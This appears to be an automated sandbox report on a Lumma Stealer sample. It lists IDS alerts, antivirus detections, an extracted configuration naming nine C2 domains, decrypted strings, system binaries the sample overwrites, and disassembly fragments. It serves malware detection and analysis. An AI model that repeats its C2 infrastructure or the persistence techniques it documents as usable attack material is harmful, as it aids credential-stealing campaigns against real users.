2024-09-30T18:19:15.063865+0200	2056036	1	Domain Observed Used for C2 Detected	192.168.2.7	63135	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:15.031016+0200	2056040	1	Domain Observed Used for C2 Detected	192.168.2.7	52053	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:15.102262+0200	2056042	1	Domain Observed Used for C2 Detected	192.168.2.7	58230	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:15.089811+0200	2056046	1	Domain Observed Used for C2 Detected	192.168.2.7	60439	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:15.114119+0200	2056052	1	Domain Observed Used for C2 Detected	192.168.2.7	50957	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:15.018204+0200	2056054	1	Domain Observed Used for C2 Detected	192.168.2.7	59776	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:15.051876+0200	2056056	1	Domain Observed Used for C2 Detected	192.168.2.7	61249	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:15.076598+0200	2056058	1	Domain Observed Used for C2 Detected	192.168.2.7	59487	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:14.537928+0200	2056172	1	Domain Observed Used for C2 Detected	192.168.2.7	49437	1.1.1.1	53	UDP
2024-09-30T18:19:15.013492+0200	2056172	1	Domain Observed Used for C2 Detected	192.168.2.7	65263	1.1.1.1	53	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: gh3zRWl4or.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900

URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Edge\L6lFlVnd0szYUYb26bZc.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\ASIzYbXK.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Edge\msedge.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\KAbPIEds.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\dZblWXPP.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\HiOQLkRz.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\TqIVmuJi.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\XkTUfoHN.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt

Found malware configuration

Source: 12.2.RegAsm.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["tearrybyiwo.shop", "fossillargeiw.shop", "surveriysiop.shop", "captainynfanw.shop", "tiddymarktwo.shop", "strappystyio.shop", "appleboltelwk.shop", "coursedonnyre.shop", "tendencerangej.shop"], "Build id": "1AsNN2--5899070203"}

Multi AV Scanner detection for dropped file

Source: C:\Edge\msedge.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\BegQTYoT.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\KAbPIEds.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\OPvxZeSl.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\XkTUfoHN.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\dZblWXPP.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\sozKoiId.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\uNKjQhPt.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\vpYzbqhQ.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\xSuJhsEU.log	ReversingLabs: Detection: 29%
Source: C:\Windows\Speech\kdmapper.exe	ReversingLabs: Detection: 68%
Source: C:\Windows\Speech\physmeme.exe	ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: gh3zRWl4or.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Joe Sandbox ML: detected
Source: C:\Edge\msedge.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\fnSuHmrC.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\aowVPJEW.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ZcXEVMnO.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BegQTYoT.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\KAbPIEds.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\dZblWXPP.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\XkTUfoHN.log	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: strappystyio.shop
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: coursedonnyre.shop
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: fossillargeiw.shop
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tendencerangej.shop
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: appleboltelwk.shop
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tearrybyiwo.shop
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: captainynfanw.shop
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: surveriysiop.shop
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tiddymarktwo.shop
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: 1AsNN2--5899070203

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:65264 version: TLS 1.2

Source: gh3zRWl4or.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000006.00000003.1361668958.0000000005244000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000006.00000003.1359428900.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 00000006.00000000.1351838623.0000000000653000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.pdb source: msedge.exe, 00000010.00000002.1577856617.0000000003522000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.2229912737.000000001AE15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: msedge.exe, 00000036.00000002.1978196231.00000000010C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\Ghosty\build\usermode\usermode.pdb source: gh3zRWl4or.exe
Source:	Binary string: em.pdb source: msedge.exe, 00000036.00000002.2118185806.000000001B611000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\Ghosty\build\usermode\usermode.pdb66 source: gh3zRWl4or.exe
Source:	Binary string: m.pdb source: msedge.exe, 00000036.00000002.2118185806.000000001B580000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 00000008.00000003.1365070939.000001D6FD270000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1364865814.000001D6FD2CD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1364609974.000001D6FD2CD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1364788311.000001D6FD2CD000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.8.dr
Source:	Binary string: stem.pdbpdbtem.pdb source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.2229912737.000000001AE15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 5ye\obj\Release\Fcs.pdb source: curl.exe, 00000008.00000003.1364788311.000001D6FD2B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: msedge.exe, 00000036.00000002.1978196231.00000000010C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.pdb source: msedge.exe, 00000010.00000002.1577856617.0000000003522000.00000004.00000800.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67418DADC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,	0_2_00007FF67418DADC
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0062A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	6_2_0062A69B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0063C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	6_2_0063C220
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0064B348 FindFirstFileExA,	6_2_0064B348

Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	12_2_0040F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	12_2_0041407F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	12_2_0041407F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	12_2_00414031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	12_2_0042D150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	12_2_0043F150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, eax	12_2_00407170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	12_2_00441100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	12_2_0044A1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	12_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], ax	12_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	12_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	12_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	12_2_0044A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0042D3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_004473FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	12_2_00424390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	12_2_004283A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	12_2_004303B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	12_2_0043F479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	12_2_0042F40F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_00443420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	12_2_0044A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	12_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	12_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	12_2_0042B490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0044A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	12_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	12_2_004206E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	12_2_00443870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0043F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	12_2_0043F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	12_2_0043A880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0044A8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	12_2_004468B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	12_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	12_2_00426910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	12_2_004449F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	12_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ecx	12_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_004499B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	12_2_0043EA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	12_2_00415ADF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	12_2_0041DAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push ebx	12_2_0041DAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	12_2_0040DAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	12_2_00426B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	12_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	12_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	12_2_00449C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	12_2_00413CC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	12_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	12_2_0042CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	12_2_0042CCF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_00428C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	12_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	12_2_0042ED6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	12_2_0042ED6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	12_2_00405D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, 0000000Bh	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_00447E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	12_2_00447E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	12_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	12_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	12_2_0041AF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	12_2_00410F0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	12_2_0042DFD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	12_2_00443FA0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056172 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop) : 192.168.2.7:49437 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056056 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop) : 192.168.2.7:61249 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056054 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop) : 192.168.2.7:59776 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056040 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop) : 192.168.2.7:52053 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056036 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop) : 192.168.2.7:63135 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056046 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop) : 192.168.2.7:60439 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056058 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop) : 192.168.2.7:59487 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056052 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop) : 192.168.2.7:50957 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056042 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop) : 192.168.2.7:58230 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056172 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop) : 192.168.2.7:65263 -> 1.1.1.1:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: tearrybyiwo.shop
Source: Malware configuration extractor	URLs: fossillargeiw.shop
Source: Malware configuration extractor	URLs: surveriysiop.shop
Source: Malware configuration extractor	URLs: captainynfanw.shop
Source: Malware configuration extractor	URLs: tiddymarktwo.shop
Source: Malware configuration extractor	URLs: strappystyio.shop
Source: Malware configuration extractor	URLs: appleboltelwk.shop
Source: Malware configuration extractor	URLs: coursedonnyre.shop
Source: Malware configuration extractor	URLs: tendencerangej.shop

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View	JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
